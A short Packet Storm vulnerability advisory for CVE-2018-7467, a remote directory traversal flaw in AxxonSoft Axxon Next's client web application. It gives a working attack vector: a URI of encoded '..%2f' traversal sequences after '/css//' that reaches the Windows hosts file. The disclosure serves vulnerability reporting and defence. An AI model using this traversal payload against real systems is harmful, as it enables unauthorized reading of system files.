AxxonSoft Axxon Next Directory Traversal

2018-02-28T00:00:00
ID PACKETSTORM:146604
Type packetstorm
Reporter Martin A Cicalla Jr
Modified 2018-02-28T00:00:00

Description

                                        
                                            `Title  
  
AxxonSoft Axxon Next - AxxonSoft Client Directory Traversal via an initial  
/css//..%2f substring in a URI. CVE-2018-7467  
  
[Vulnerability Type]  
  
Directory Traversal via an initial /css//..%2f substring in a URI  
  
[Vendor of Product]  
  
AxxonSoft Client  
  
[Affected Product Code Base]  
  
Axxon Next  
  
[Affected Component]  
  
AxxonSoft Client Web Application's Source Code  
  
[Attack Type]  
  
Remote  
  
[Impact Information Disclosure]  
  
true  
  
[Attack Vectors]  
  
It is a Directory Traversal   
  
  
/css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f  
..%2f..%2f..%2f..%2fwindows\System32\drivers\etc\hosts  
  
  
  
[Discoverer]  
  
Martin A Cicalla Jr  
`